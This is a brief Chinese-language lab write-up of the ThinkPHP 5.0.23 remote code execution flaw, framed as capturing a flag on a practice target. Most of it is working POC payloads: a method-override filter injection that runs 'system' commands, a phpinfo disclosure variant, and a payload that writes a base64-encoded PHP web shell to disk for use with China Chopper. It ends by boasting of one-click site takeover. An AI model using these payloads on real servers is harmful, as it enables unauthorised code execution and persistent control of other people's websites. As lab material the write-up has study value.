Thinkphp5.0.23 远程代码执行

oldmoon

Thinkphp5.0.23 远程代码执行

1. 漏洞概述低于5.0.23版本都存在远程代码执行
write up首先打开靶场

利用POC来拿flag

1. <font size="4" face="宋体">_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls /tmp</font>

复制代码

使用phpinfo函数验证来获取敏感信息

1. <font size="4" face="宋体">_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1</font>

复制代码

如果要上传 shell ,传 shell 的时候，要 把 eval 替换成 assert 并进行base64转义。对
aaa<?php @assert($_POST['xss']);?>bbb 进行base64转义，
转义完成后的POC

1. <font size="4" face="宋体">_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n YWFhPD9waHAgQGFzc2VydCgkX1BPU1RbJ3hzcyddKTs/PmJiYg== | base64 -d > shell1.php</font>

复制代码

成功访问,说明上传成功。

用菜刀去连接。

接上来上大招，一键日站。